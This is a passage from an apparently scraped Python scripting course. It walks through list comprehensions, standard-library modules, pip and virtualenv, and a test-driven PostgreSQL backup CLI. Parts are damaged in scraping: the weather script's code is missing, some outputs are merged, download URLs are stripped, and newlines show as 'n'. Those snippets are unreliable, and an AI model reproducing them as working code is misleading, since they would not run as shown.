Functions If you’re interested in writing code with the subprocess module that will still work with Python 2, then you cannot use the subprocess.run function because it’s only in Python 3. For this situation, you’ll want to look into using subprocess.call and subprocess.check_output. Advanced Iteration with List Comprehensions 00:11:10 Lesson Description: We’ve talked about how often we’re likely to work with large amounts of data, and we often want to take a list and either: Filter out items in that list Modify every item in the list For this, we can utilize “list comprehensions”. Python Documentation For This Video List Comprehensions Note: we need the words file to exist at /usr/share/dict/words for this video. This can be installed via: $ sudo yum install -y words Our contains Script To dig into list comprehensions, we’re going to write a script that takes a word that then returns all of the values in the “words” file on our machine that contain the word. Our first step will be writing the script using standard iteration, and then we’re going to refactor our script to utilize a list comprehension. ~/bin/contains #!/usr/bin/env python3.6 import argparse parser = argparse.ArgumentParser(description='Search for words including partial word') parser.add_argument('snippet', help='partial (or complete) string to search for in words') args = parser.parse_args() snippet = args.snippet.lower() with open('/usr/share/dict/words') as f: words = f.readlines() matches = [] for word in words: if snippet in word.lower(): matches.append(word) print(matches) Let’s test out our first draft of the script to make sure that it works: $ chmod u+x bin/contains $ contains Keith ['Keithn', 'Keithleyn', 'Keithsburgn', 'Keithvillen'] Note: Depending on your system’s words file your results may vary. Utilizing a List Comprehension This portion of our script is pretty standard: ~/bin/contains (partial) words = open('/usr/share/dict/words').readlines() matches = [] for word in words: if snippet in word.lower(): matches.append(word) print(matches) We can rewrite that chunk of our script as one or two lines using a list comprehension: ~/bin/contains (partial) words = open('/usr/share/dict/words').readlines() print([word for word in words if snippet in word.lower()]) We can take this even further by removing the 'n' from the end of each “word” we return: ~/bin/contains (partial) words = open('/usr/share/dict/words').readlines() print([word.strip() for word in words if snippet in word.lower()]) Final Version Here’s the final version of our script that works (nearly) the same as our original version: ~/bin/contains #!/usr/bin/env python3.6 import argparse parser = argparse.ArgumentParser(description='Search for words including partial word') parser.add_argument('snippet', help='partial (or complete) string to search for in words') args = parser.parse_args() snippet = args.snippet.lower() words = open('/usr/share/dict/words').readlines() print([word.strip() for word in words if snippet in word.lower()]) Here’s our output: $ contains Keith ['Keith', 'Keithley', 'Keithsburg', 'Keithville'] Useful Standard Library Packages random & json 00:11:53 Lesson Description: Over the next few videos, we’re going to look at some more useful packages that we have access to from the Python standard library as we build a tool to reconcile some receipts. Python Documentation For This Video The random module The json module The range type Generating Random Test Data To write our receipt reconciliation tool, we need to have some receipts to work with as we’re testing out our implementation. We’re expecting receipts to be JSON files that contain some specific data and we’re going to write a script that will create some receipts for us. We’re working on a system that requires some local paths, so let’s put what we’re doing in a receipts directory: $ mkdir -p receipts/new $ cd receipts The receipts that haven’t been reconciled will go in the new directory, so we’ve already created that. Let’s create a gen_receipts.py file to create some unreconciled receipts when we run it: ~/receipts/gen_receipts.py import random import os import json count = int(os.getenv("FILE_COUNT") or 100) words = [word.strip() for word in open('/usr/share/dict/words').readlines()] for identifier in range(count): amount = random.uniform(1.0, 1000) content = { 'topic': random.choice(words), 'value': "%.2f" % amount } with open(f'./new/receipt-{identifier}.json', 'w') as f: json.dump(content, f) We’re using the json.dump function to ensure that we’re writing out valid JSON (we’ll read it in later). random.choice allows us to select one item from an iterable (str, tuple, or list). The function random.uniform gives us a float between the two bounds specified. This code does show us how to create a range, which takes a starting number and an ending number and can be iterated through the values between. Now we can run our script using the python3.6 command: $ FILE_COUNT=10 python3.6 gen_receipts.py $ ls new/ receipt-0.json receipt-2.json receipt-4.json receipt-6.json receipt-8.json receipt-1.json receipt-3.json receipt-5.json receipt-7.json receipt-9.json $ cat new/receipt-0.json {"topic": "microceratous", "value": "918.67"} shutil & glob 00:16:57 Lesson Description: Some of the most used utilities in Linux are mv, mkdir, cp, ls, and rm. Thankfully, we don’t need to utilize subprocess to access the same functionality of these utilities because the standard library has us covered. Python Documentation For This Video The os.mkdir function The shutil module The glob module The json module Creating a Directory If It Doesn’t Exist Before we start doing anything with the receipts, we want to have a processed directory to move them to so that we don’t try to process the same receipt twice. Our script can be smart enough to create this directory for us if it doesn’t exist when we first run the script. We’ll use the os.mkdir function; if the directory already exists we can catch the OSError that is thrown: ~/receipts/process_receipts.py import os try: os.mkdir("./processed") except OSError: print("'processed' directory already exists") Collecting the Receipts to Process From the shell, we’re able to collect files based on patterns, and that’s useful. For our purposes, we want to get every receipt from the new directory that matches this pattern: receipt-[0-9]*.json That pattern translates to receipt-, followed by any number of digits, and ending with a .json file extension. We can achieve this exact result using the glob.glob function. ~/receipts/process_receipts.py (partial) receipts = glob.glob('./new/receipt-[0-9]*.json') subtotal = 0.0 Part of processing the receipts will entail adding up all of the values, so we’re going to start our script with a subtotal of 0.0. Reading JSON, Totaling Values, and Moving Files The remainder of our script is going to require us to do the following: Iterate over the receipts Reading each receipt’s JSON Totaling the value of the receipts Moving each receipt file to the processed directory after we’re finished with it We used the json.dump function to write out a JSON file, and we can use the opposite function json.load to read a JSON file. The contents of the file will be turned into a dictionary that we can us to access its keys. We’ll add the value to the subtotal before finally moving the file using shutil.move. Here’s our final script: ~/receipts/process_receipts.py import glob import os import shutil import json try: os.mkdir("./processed") except OSError: print("'processed' directory already exists") # Get a list of receipts receipts = glob.glob('./new/receipt-[0-9]*.json') subtotal = 0.0 for path in receipts: with open(path) as f: content = json.load(f) subtotal += float(content['value']) name = path.split('/')[-1] destination = f"./processed/{name}" shutil.move(path, destination) print(f"moved '{path}' to '{destination}'") print("Receipt subtotal: $%.2f" % subtotal) Let’s add some files that don’t match our pattern to the new directory before running our script: touch new/receipt-other.json new/receipt-14.txt new/random.txt Finally, let’s run our script twice and see what we get: $ python3.6 process_receipts.py moved './new/receipt-0.json' to './processed/receipt-0.json' moved './new/receipt-1.json' to './processed/receipt-1.json' moved './new/receipt-2.json' to './processed/receipt-2.json' moved './new/receipt-3.json' to './processed/receipt-3.json' moved './new/receipt-4.json' to './processed/receipt-4.json' moved './new/receipt-5.json' to './processed/receipt-5.json' moved './new/receipt-6.json' to './processed/receipt-6.json' moved './new/receipt-7.json' to './processed/receipt-7.json' moved './new/receipt-8.json' to './processed/receipt-8.json' moved './new/receipt-9.json' to './processed/receipt-9.json' Receipt subtotal: $6932.04 $ python3.6 process_receipts.py 'processed' directory already exists Receipt subtotal: $0.00 Note: The subtotal that is printed for you will be different since our receipts are all randomly generated. re & math 00:15:58 Lesson Description: In this video, we take a look at some potential modifications that we can make to our process_receipts.py file to change how we work with strings and numbers. Python Documentation For This Video The re module The math module More Specific Patterns Using Regular Expressions (The re Module) Occasionally, we need to be very specific about string patterns that we use, and sometimes those are just not doable with basic globbing. As an exercise in this, let’s change our process_receipts.py file to only return even numbered files (regardless of length). Let’s generate some more receipts and try to accomplish this from the REPL: $ FILE_COUNT=20 python3.6 gen_receipts.py $ python3.6 >>> import glob >>> receipts = glob.glob('./new/receipt-[0-9]*[24680].json') >>> receipts.sort() >>> receipts ['./new/receipt-10.json', './new/receipt-12.json', './new/receipt-14.json', './new/receipt-16.json', './new/receipt-18.json'] That glob was pretty close, but it didn’t give us the single-digit even numbers. Let’s try now using the re (Regular Expression) module’s match function, the glob.iglob function, and a list comprehension: >>> import re >>> receipts = [f for f in glob.iglob('./new/receipt-[0-9]*.json') if re.match('./new/receipt-[0-9]*[02468].json', f)] >>> receipts ['./new/receipt-0.json', './new/receipt-2.json', './new/receipt-4.json', './new/receipt-6.json', './new/receipt-8.json', './new/receipt-10.json', './new/receipt-12.json', './new/receipt-14.json', './new/receipt-16.json', './new/receipt-18.json'] We’re using the glob.iglob function instead of the standard glob function because we knew we were going to iterate through it and make modifications at the same time. This iterator allows us to avoid fitting the whole expanded glob.glob list into memory at one time. Regular Expressions are a pretty big topic, but once you’ve learned them, they are incredibly useful in scripts and also when working with tools like grep. The re module gives us quite a few powerful ways to use regular expressions in our python code. Improved String Replacement One actual improvement that we can make to our process_receipts.py file is that we can use a single function call to go from our path variable to the destination that we want. This section: ~/receipts/process_receipts.py (partial) name = path.split('/')[-1] destination = f"./processed/{name}" Becomes this using the str.replace method: destination = path.replace('new', 'processed') This is a useful refactoring to make because it makes the intention of our code more clear. Working With Numbers Using math Depending on how we want to process the values of our receipts, we might want to manipulate the numbers that we are working with by rounding; going to the next highest integer, or the next lowest integer. These sort of “rounding” actions are pretty common, and some of them require the math module: >>> import math >>> math.ceil(1.1) 2 >>> math.floor(1.1) 1 >>> round(1.1111111111, 2) 1.11 We can utilize the built-in round function to clean up the printing of the subtotal at the end of the script. Here’s the final version of process_receipts.py: ~/receipts/process_receipts.py import glob import os import shutil import json try: os.mkdir("./processed") except OSError: print("'processed' directory already exists") subtotal = 0.0 for path in glob.iglob('./new/receipt-[0-9]*.json'): with open(path) as f: content = json.load(f) subtotal += float(content['value']) destination = path.replace('new', 'processed') shutil.move(path, destination) print(f"moved '{path}' to '{destination}'") print(f"Receipt subtotal: ${round(subtotal, 2)}") BONUS: Truncate Float Without Rounding I mentioned in the video that you can do some more complicated math to print a number to a specified number of digits without rounding. Here’s an example a function that would do the truncation (for those curious): >>> import math >>> def ftruncate(f, ndigits=None): ... if ndigits and (ndigits > 0): ... multiplier = 10 ** ndigits ... num = math.floor(f * multiplier) / multiplier ... else: ... num = math.floor(f) ... return num >>> num = 1.5441020468646993 >>> ftruncate(num) 1 >>> ftruncate(num, 2) 1.54 >>> ftruncate(num, 8) 1.54410204 Exercise: Creating and Using Functions 00:30:00 Exercise: Using the 'os' Package and Environment Variables 00:30:00 Exercise: Creating Files Based on User Input 00:30:00 Exercise: Handling Errors When Files Don't Exist 00:30:00 Exercise: Interacting with External Commands 00:30:00 Exercise: Setting Exit Status on Error 00:30:00 Python Scripting and IO Third-Party Packages Using Pip and Virtualenv Installing Third-Party Packages Using 'pip' 00:09:03 Lesson Description: We installed pip3.6 when we built Python 3, and now we’re ready to start working with Third-Party code. Python Documentation For This Video pip boto3 Viewing Installed Packages We can check out your installed packages using the list subcommand: $ pip3.6 list DEPRECATION: The default format will switch to columns in the future. You can use --format=(legacy|columns) (or define a format=(legacy|columns) in your pip.conf under the [list] section) to disable this warning. pip (9.0.1) setuptools (28.8.0) You may have gotten a deprecation warning. To fix that, let’s create a $HOME/.config/pip/pip.conf file: $ mkdir -p ~/.config/pip $ vim ~/.config/pip/pip.conf ~/.config/pip/pip.conf [list] format=columns Now if we use list we’ll get a slightly different result: $ pip3.6 list Package Version ---------- ------- pip 9.0.1 setuptools 28.8.0 Installing New Packages Later in this course, we’ll be using the boto3 package to interact with AWS S3. Let’s use that as an example package to install using the install subcommand: $ pip3.6 install boto3 ... PermissionError: [Errno 13] Permission denied: '/usr/local/lib/python3.6/site-packages/jmespath' Since we installed Python 3.6 into /usr/local, it’s meant to be usable by all users, but we can only add or remove packages if we’re root (or via sudo). $ sudo pip3.6 install boto3 Managing Required Packages with requirements.txt If we have a project that relies on boto3, we probably want to keep track of that dependency somewhere, and pip can facilitate this through a “requirements file” traditionally called requirements.txt. If we’ve already installed everything manually, then we can dump the current dependency state using the freeze subcommand that pip provides. $ pip3.6 freeze boto3==1.5.22 botocore==1.8.36 docutils==0.14 jmespath==0.9.3 python-dateutil==2.6.1 s3transfer==0.1.12 six==1.11.0 $ pip3.6 freeze > requirements.txt Now we can use this file to tell pip what to install (or uninstall) using the -r flag to either command. Let’s uninstall these packages from the global site-packages: $ sudo pip3.6 uninstall -y -r requirements.txt Installing Packages Local To Our User We need to use sudo to install packages globally, but sometimes we only want to install a package for ourselves, and we can do that by using the --user flag to the install command. Let’s reinstall boto3 so that it’s local to our user by using our requirements.txt file: $ pip3.6 install --user -r requirements.txt $ pip3.6 list --user $ pip3.6 uninstall boto3 Virtualenv 00:05:07 Lesson Description: We can only have one version of a package installed at a given time, and this can sometimes be a headache if we have multiple projects that require different versions of the same dependency. This is where virtualenv comes into play and allows us to create sandboxed Python environments. Python Documentation for This Video venv Virtualenv or Venv Virtualenvs allow you to create sandboxed Python environments. In Python 2, you need to install the virtualenv package to do this, but with Python 3 it’s been worked in under the module name of venv. To create a virtualenv, we’ll use the following command: $ python3.6 -m venv [PATH FOR VIRTUALENV] The -m flag loads a module as a script, so it looks a little weird, but “python3.6 -m venv” is a stand-alone tool. This tool can even handle its own flags. Let’s create a directory to store our virtualenvs called venvs. From here we create an experiment virtualenv to see how they work. $ mkdir venvs $ python3.6 -m venv venvs/experiment Virtualenvs are local Python installations with their own site-packages, and they do absolutely nothing for us by default. To use a virtualenv, we need to activate it. We do this by sourcing an activate file in the virtualenv’s bin directory: $ source venvs/experiment/bin/activate (experiment) ~ $ Notice that our prompt changed to indicate to us what virtualenv is active. This is part of what the activate script does. It also changes our $PATH: (experiment) ~ $ echo $PATH /home/user/venvs/experiment/bin:/home/user/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/user/.local/bin:/home/user/bin (experiment) ~ $ which python ~/venvs/experiment/bin/python (experiment) ~ $ python --version Python 3.6.4 (experiment) ~ $ pip list Package Version ---------- ------- pip 9.0.1 setuptools 28.8.0 (experiment) ~ $ deactivate $ which python /usr/bin/python With the virtualenv activated, the python and pip binaries point to the local Python 3 variations, so we don’t need to append the 3.6 to all of our commands. To remove the virtualenv’s contents from our $PATH, we will utilize the deactivate script that the virtualenv provided. Using Third-Party Packages in Your Scripts 00:14:34 Lesson Description: Now that we know how to install third-party code, it’s time to learn how to use it in our scripts. Python Documentation For This Video The requests package The argparse.ArgumentParser class The os.getenv function The sys.exit function Creating a Weather Script We’re going to write up the start of a script that can provide us with weather information using data from openweathermap.org. For this video, we’re going to be installing another package called requests. This is a nice package for making web requests from Python and one of the most used Python packages. You will need to get your API key from OpenWeatherMap to follow along with this video. Let’s start off by activating the experiment virtualenv that we created in the previous video. Install the package and set an environment variable with an API key: $ source ~/venvs/experiment/bin/activate (experiment) $ pip install requests (experiment) $ export OWM_API_KEY=[YOUR API KEY] Create a new script called weather: ~/bin/weather #!/usr/bin/env python3.6()) Notice that we were able to use the requests package in the same way that we would any package from the standard library. Let’s try it out: (experiment) $ chmod u+x ~/bin/weather (experiment) $ weather 45891 (experiment) ~ $43, 'country': 'US', 'sunrise': 1517143892, 'sunset': 1517179914}, 'id': 0, 'name': 'Van Wert', 'cod': 200} Making weather Work Regardless of the Active Virtualenv Currently, our weather script will only work if the experiment virtualenv is active since no other Python has requests installed. We can get around this by changing the shebang to point to the specific python within our virtualenv: Make this script work regardless of active python by using this as the shebang: #!/home/$USER/venvs/experiment/python You’ll need to substitute in your actual username for $USER. Here’s what the script looks like on a cloud server with the username of user: ~/bin/weather #!/home/user/venvs/experiment/bin/python()) Now if we deactivate and use the script it will still work: (experiment) $ deactivate $35, 'country': 'US', 'sunrise': 1517143892, 'sunset': 1517179914}, 'id': 0, 'name': 'Van Wert', 'cod': 200} Take is as a challenge to build on this example to make a more full-featured weather CLI. Exercise: Installing Third-Party Packages 00:30:00 Exercise: Utilizing Third-Party Packages 00:30:00 Python Packages and Dependencies Creating a Larger Scripting Project Planning & Project Structure Examining the Problem & Prep Work 00:08:03 Lesson Description: In this last segment, we’re tackling a single, large problem over multiple videos. We’ll dig into development practices that we can utilize to ensure the success of our projects. Our approach will include: Project Planning Documentation Test Driven Development (TDD) Through Test Driven Development, we’ll run into a wide variety of errors and establish a familiarity with the stack trace that will make debugging projects in the future easier. Links For This Video db_setup.sh PostgreSQL RPM The Project We have many database servers that we manage, and we want to create a single tool that we can use to easily back up the databases to either AWS S3 or locally. We would like to be able to: Specify the database URL to backup. Specify a “driver” (local or s3) Specify the backup “destination”. This will be a file path for local and a bucket name for s3. Depending on the “driver”, create a local backup of the database or upload the backup to an S3 bucket. Setting up PostgreSQL Lab Server Before we begin, we’re going to need to need a PostgreSQL database to work with. The code repository for this course contains a db_setup.sh script that we’ll use on a CentOS 7 cloud server to create and run our database. Create a “CentOS 7” cloud server and run the following on it: $ curl -o db_setup.sh $ chmod +x db_setup.sh $ ./db_setup.sh You will be prompted for your sudo password and for the username and password you’d like to use to access the database. Installing The Postgres 9.6 Client On our development machines, we’ll need to make sure that we have the Postgres client installed. The version needs to be 9.6.6. On Red-hat systems we’ll use the following: $ wget $ sudo yum install pgdg-centos96-9.6-3.noarch.rpm epel-release $ sudo yum update $ sudo yum install postgresql96 On debian systems, the equivalent would be: $ sudo apt-get install postgres-client-9.6 Test connection from Workstation Let’s make sure that we can connect to the PostgreSQL server from our development machine by running the following command: *Note: You’ll need to substitute in your database user’s values for [USERNAME], [PASSWORD], and [SERVER_IP]. $ psql postgres://[USERNAME]:[PASSWORD]@[SERVER_IP]:80/sample -c "SELECT count(id) FROM employees;" With this prep work finished, we’re ready to start planning the project itself. Planning Through Documentation 00:15:18 Lesson Description: To start out our project, we’re going to set up our source control, our virtualenv, and finally start documenting how we want the project to work. Creating the Repo and Virtualenv Since we’re building a project that will likely be more than a single file, we’re going to create a full project complete with source control and dependencies. We’ll start by creating the directory to hold our project, and we’re going to place this in a code directory: $ rm ~/requirements.txt $ mkdir -p ~/code/pgbackup $ cd ~/code/pgbackup We’ve talked about pip and virtualenvs, and how they allow us to manage our dependency versions. For a development project, we will leverage a new tool to manage our project’s virtualenv and install dependencies. This tool is called pipenv. Let’s install pipenv for our user and create a Python 3 virtualenv for our project: $ pip3.6 install --user pipenv $ pipenv --python $(which python3.6) Rather than creating a requirements.txt file for us, pipenv has created a Pipfile that it will use to store virtualenv and dependency information. To activate our new virtualenv, we use the command pipenv shell, and to deactivate it we use exit instead of deactivate. Next, let’s set up git as our source control management tool by initializing our repository. We’ll also add a .gitignore file from GitHub so that we don’t later track files that we don’t mean to. $ git init $ curl -o .gitignore Sketch out the README.rst One great way to start planning out a project is to start by documenting it from the top level. This is the documentation that we would give to someone who wanted to know how to use the tool but didn’t care about creating the tool. This approach is sometimes called “README Driven Development”. Whenever we write documentation in a Python project, we should be using reStructuredText. We use this specific markup format because there are tools in the Python ecosystem that can read this text and render documentation in a standardized way. Here’s our READEME.rst file: ~/code/pgbackup/README.rst pgbackup ======== CLI for backing up remote PostgreSQL databases locally or to AWS S3. Preparing for Development ------------------------- 1. Ensure ``pip`` and ``pipenv`` are installed 2. Clone repository: ``git clone git@github.com:example/pgbackup`` 3. ``cd`` into repository 4. Fetch development dependencies ``make install`` 5. Activate virtualenv: ``pipenv shell`` Usage ----- Pass in a full database URL, the storage driver, and destination. S3 Example w/ bucket name: :: $ pgbackup postgres://bob@example.com:5432/db_one --driver s3 backups Local Example w/ local path: :: $ pgbackup postgres://bob@example.com:5432/db_one --driver local /var/local/db_one/backups Running Tests ------------- Run tests locally using ``make`` if virtualenv is active: :: $ make If virtualenv isn’t active then use: :: $ pipenv run make Our Initial Commit Now that we’ve created our README.rst file to document what we plan on doing with this project, we’re in a good position to stage our changes and make our first commit: $ git add --all . $ git commit -m 'Initial commit' Initial Project Layout 00:14:01 Lesson Description: The last thing we need to do before we start implementing our pgbackup tool is structure the project with the required files and folders. Documentation For This Video The setuptools package The make documentation Create Package Layout There are a few specific places that we’re going to put code in this project: In a src/pgbackup directory. This is where our project’s business logic will go. In a tests directory. We’ll put automated tests here. We’re not going to write the code that goes in these directories just yet, but we are going to create them and put some empty files in so that we can make a git commit that contains these directories. In our src/pgbackup directory, we’ll use a special file called __init__.py, but in our tests directory, we’ll use a generically named, hidden file. (pgbackup-E7nj_BsO) $ mkdir -p src/pgbackup tests (pgbackup-E7nj_BsO) $ touch src/pgbackup/__init__.py tests/.keep Writing Our setup.py One of the requirements for an installable Python package is a setup.py file at the root of the project. In this file, we’ll utilize setuptools to specify how our project is to be installed and define its metadata. Let’s write out this file now: ~/code/pgbackup/setup.py from setuptools import setup, find_packages with open('README.rst', encoding='UTF-8') as f: readme = f.read() setup( name='pgbackup', version='0.1.0', description='Database backups locally or to AWS S3.', long_description=readme, author='Keith', author_email='keith@linuxacademy.com', packages=find_packages('src'), package_dir={'': 'src'}, install_requires=[] ) For the most part, this file is metadata, but the packages, package_dir, and install_requires parameters of the setup function define where setuptools will look for our source code and what other packages need to be installed for our package to work. To make sure that we didn’t mess up anything in our setup.py, we’ll install our package as a development package using pip. (pgbackup-E7nj_BsO) $ pip install -e . Obtaining Installing collected packages: pgbackup Running setup.py develop for pgbackup Successfully installed pgbackup It looks like everything worked, and we won’t need to change our setup.py for awhile. For the time being, let’s uninstall pgbackup since it doesn’t do anything yet: (pgbackup-E7nj_BsO) $ pip uninstall pgbackup Uninstalling pgbackup-0.1.0: /home/user/.local/share/virtualenvs/pgbackup-E7nj_BsO/lib/python3.6/site-packages/pgbackup.egg-link Proceed (y/n)? y Successfully uninstalled pgbackup-0.1.0 Makefile In our README.rst file, we mentioned that to run tests we wanted to be able to simply run make from our terminal. To do that, we need to have a Makefile. We’ll create a second make task that can be used to setup the virtualenv and install dependencies using pipenv also. Here’s our Makefile: ~/code/pgbackup/Makefile .PHONY: default install test default: test install: pipenv install --dev --skip-lock test: PYTHONPATH=./src pytest This is a great spot for us to make a commit: (pgbackup-E7nj_BsO) $ git add --all . (pgbackup-E7nj_BsO) $ git commit -m 'Structure project with setup.py and Makefile' [master 1c0ed72] Structure project with setup.py and Makefile 4 files changed, 26 insertions(+) create mode 100644 Makefile create mode 100644 setup.py create mode 100644 src/pgbackup/__init__.py create mode 100644 tests/.keep Implementing Features with Test Driven Development Introduction to TDD and First Tests 00:14:22 Lesson Description: With our project structured, we’re finally ready to start implementing the logic to create database backups. We’re going to tackle this project using “Test Driven Development”, so let’s learn the basics of TDD now. Documentation For This Video The pytest package The pytest.raises function Installing pytest For this course, we’re using pytest as our testing framework. It’s a simple tool, and although there is a unit testing framework built into Python, I think that pytest is a little easier to understand. Before we can use it though, we need to install it. We’ll use pipenv and specify that this is a “dev” dependency: (pgbackup-E7nj_BsO) $ pipenv install --dev pytest ... Adding pytest to Pipfile's [dev-packages]… Locking [dev-packages] dependencies… Locking [packages] dependencies… Updated Pipfile.lock (5c8539)! Now the line that we wrote in our Makefile that utilized the pytest, CLI will work. Writing Our First Tests The first step of TDD is writing a failing test. In our case, we’re going to go ahead and write a few failing tests. Using pytest, our tests will be functions with names that start with test_. As long as we name the functions properly, the test runner should find and run them. We’re going to write three tests to start: A test that shows that the CLI fails if no driver is specified. A test that shows that the CLI fails if there is no destination value given. A test that shows, given a driver and a destination, that the CLI’s returned Namespace has the proper values set. At this point, we don’t even have any source code files, but that doesn’t mean that we can’t write code that demonstrates how we would like our modules to work. The module that we want is called cli, and it should have a create_parser function that returns an ArgumentParser configured for our desired use. Let’s write some tests that exercise cli.create_parser and ensure that our ArgumentParser works as expected. The name of our test file is important; make sure that the file starts with test_. This file will be called test_cli.py. ~/code/pgbackup/tests/test_cli.py import pytest from pgbackup import cli url = "postgres://bob:password@example.com:5432/db_one" def test_parser_without_driver(): """ Without a specified driver the parser will exit """ with pytest.raises(SystemExit): parser = cli.create_parser() parser.parse_args([url]) def test_parser_with_driver(): """ The parser will exit if it receives a driver without a destination """ parser = cli.create_parser() with pytest.raises(SystemExit): parser.parse_args([url, "--driver", "local"]) def test_parser_with_driver_and_destination(): """ The parser will not exit if it receives a driver with a destination """ parser = cli.create_parser() args = parser.parse_args([url, "--driver", "local", "/some/path"]) assert args.driver == "local" assert args.destination == "/some/path"</code></pre>Running Tests Now that we’ve written a few tests, it’s time to run them. We’ve created our Makefile already, so let’s make sure our virtualenv is active and run them: $ pipenv shell 0 items / 1 errors ============================================= ERRORS ============================================== ___ ERROR collecting tests/test_cli.py ____ ImportError while importing test module '/home/user/code/pgbackup/tests/test_cli.py'. Hint: make sure your test modules/packages have valid Python names. Traceback: tests/test_cli.py:3: in from pgbackup import cli E ImportError: cannot import name 'cli' !!!!!!!!!!!!!!!!!!!!!!!!!!!!! Interrupted: 1 errors during collection !!!!!!!!!!!!!!!!!!!!!!!!!!!!! ===================================== 1 error in 0.11 seconds ===================================== make: *** [test] Error 2 We get an ImportError from our test file because there is no module in pgbackup named cli. This is awesome because it tells us what our next step is. We need to create that file. Implementing CLI Guided By Tests 00:22:54 Lesson Description: We now have some breaking tests to help guide us to the implementation of our client module. Let’s follow the errors that we see to get our tests passing. Documentation For This Video The argparse package The argparse.Action class The pytest package The pytest.fixture function Python decorators Moving Through Failing Tests Our current test failure is from there not being a cli.py file within the src/pgbackup directory. Let’s do just enough to move onto the next error: (partial make output) (pgbackup-E7nj_BsO) $ touch src/pgbackup/cli.py 3 items tests/test_cli.py FFF [100%] ============================================ FAILURES ============================================= ___________________________________ test_parser_without_driver ____________________________________ def test_parser_without_driver(): """ Without a specified driver the parser will exit """ with pytest.raises(SystemExit): > parser = cli.create_parser() E AttributeError: module 'pgbackup.cli' has no attribute 'create_parser' tests/test_cli.py:12: AttributeError ... Now we’re getting an AttributeError because there is not an attribute/function called create_parser. Let’s implement a version of that function that creates an ArgumentParser that hasn’t been customized: ~/code/pgbackup/src/pgbackup/cli.py from argparse import ArgumentParser def create_parser(): parser = ArgumentParser() return parser Once again, let’s run our tests: (partial make output) (pgbackup-E7nj_BsO) $ make ... self = ArgumentParser(prog='pytest', usage=None, description=None, formatter_class=, conflict_handler='error', add_help=True) status = 2 message = 'pytest: error: unrecognized arguments: postgres://bob:password@example.com:5432/db_one --driver local /some/pathn' def exit(self, status=0, message=None): if message: self._print_message(message, _sys.stderr) > _sys.exit(status) E SystemExit: 2 /usr/local/lib/python3.6/argparse.py:2376: SystemExit -------------------------------------- Captured stderr call --------------------------------------- usage: pytest [-h] pytest: error: unrecognized arguments: postgres://bob:password@example.com:5432/db_one --driver local /some/path =============================== 1 failed, 2 passed in 0.14 seconds ================================ Interestingly, two of the tests succeeded. Those two tests were the ones that expected there to be a SystemExit error. Our tests sent unexpected output to the parser (since it wasn’t configured to accept arguments), and that caused the parser to error. This demonstrates why it’s important to write tests that cover a wide variety of use cases. If we hadn’t implemented the third test to ensure that we get the expected output on success, then our test suite would be green! Creating Our First Class For this course, we haven’t created any custom classes because it’s not something that we’ll do all the time, but in the case of our CLI, we need to. Our idea of having a flag of --driver that takes two distinct values isn’t something that any existing argparse.Action can do. Because of this, we’re going to follow along with the documentation and implement our own custom DriverAction class. We can put our custom class in our cli.py file and use it in our add_argument call. src/pgbackup/cli.py from argparse import Action, ArgumentParser class DriverAction(Action): def __call__(self, parser, namespace, values, option_string=None): driver, destination = values namespace.driver = driver.lower() namespace.destination = destination def create_parser(): parser = ArgumentParser(description=""" Back up PostgreSQL databases locally or to AWS S3. """) parser.add_argument("url", help="URL of database to backup") parser.add_argument("--driver", help="how & where to store backup", nargs=2, action=DriverAction, required=True) return parser Adding More Tests Our CLI is coming along, but we probably want to raise an error if the end-user tries to use a driver that we don’t understand. Let’s add a few more tests that do the following: Ensure that you can’t use a driver that is unknown, like azure. Ensure that the drivers for s3 and local don’t cause errors. test/test_cli.py (partial) def test_parser_with_unknown_drivers(): """ The parser will exit if the driver name is unknown. """ parser = cli.create_parser() with pytest.raises(SystemExit): parser.parse_args([url, "--driver", "azure", "destination"]) def test_parser_with_known_drivers(): """ The parser will not exit if the driver name is known. """ parser = cli.create_parser() for driver in ['local', 's3']: assert parser.parse_args([url, "--driver", driver, "destination"]) Adding Driver Type Validation Since we already have a custom DriverAction, we can feel free to customize this to make our CLI a little more intelligent. The only drivers that we are going to support (for now) are s3 and local, so let’s add some logic to our action to ensure that the driver given is one that we can work with: known_drivers = ['local', 's3'] class DriverAction(Action): def __call__(self, parser, namespace, values, option_string=None): driver, destination = values if driver.lower() not in known_drivers: parser.error("Unknown driver. Available drivers are 'local' & 's3'") namespace.driver = driver.lower() namespace.destination = destination Removing Test Duplication Using pytest.fixture Before we consider this unit of our application complete, we should consider cleaning up some of the duplication in our tests. We create the parser using create_parser in every test but using pytest.fixture we can extract that into a separate function and inject the parser value into each test that needs it. Here’s what our parser function will look like: tests/test_cli.py (partial) import pytest @pytest.fixture def parser(): return cli.create_parser() We haven’t run into this yet, but the @pytest.fixture on top of our function definition is what’s known as a “decorator”. A “decorator” is a function that returns a modified version of the function. We’ve seen that if we don’t use parentheses that our functions aren’t called, and because of that we’re able to pass functions into other functions as arguments. This particular decorator will register our function in the list of fixtures that can be injected into a pytest test. To inject our fixture, we will add an argument to our test function definition that has the same name as our fixture name, in this case, parser. Here’s the final test file: tests/test_cli.py import pytest from pgbackup import cli url = "postgres://bob@example.com:5432/db_one" @pytest.fixture() def parser(): return cli.create_parser() def test_parser_without_driver(parser): """ Without a specified driver the parser will exit """ with pytest.raises(SystemExit): parser.parse_args([url]) def test_parser_with_driver(parser): """ The parser will exit if it receives a driver without a destination """ with pytest.raises(SystemExit): parser.parse_args([url, "--driver", "local"]) def test_parser_with_driver_and_destination(parser): """ The parser will not exit if it receives a driver with a destination """ args = parser.parse_args([url, "--driver", "local", "/some/path"]) assert args.driver == "local" assert args.destination == "/some/path" def test_parser_with_unknown_drivers(parser): """ The parser will exit if the driver name is unknown. """ with pytest.raises(SystemExit): parser.parse_args([url, "--driver", "azure", "destination"]) def test_parser_with_known_drivers(parser): """ The parser will not exit if the driver name is known. """ for driver in ['local', 's3']: assert parser.parse_args([url, "--driver", driver, "destination"]) Now, all of our tests should pass, and we’re in a good spot to make a commit. Introduction to Mocking in Tests 00:12:03 Lesson Description: The simplest way that we can get all of the information that we need out of a PostgreSQL is to use the pg_dump utility that Postgres itself provides. Since that code exists outside of our codebase, it’s not our job to ensure that the pg_dump tool itself works, but we do need to write tests that can run without an actual Postgres server running. For this, we will need to “stub” our interaction with pg_dump. Documentation For This Video The pytest-mock package The subprocess package The subprocess.Popen class Install pytest-mock Before we can learn how to use mocking in our tests, we need to install the pytest-mock package. This will pull in a few packages for us, and mainly provide us with a mocker fixture that we can inject into our tests: (pgbackup-E7nj_BsO) $ pipenv install --dev pytest-mock Writing Tests With Mocking We’re going to put all of the Postgres related logic into its own module called pgdump, and we’re going to begin by writing our tests. We want this module to do the following: Make a call out to pg_dump using 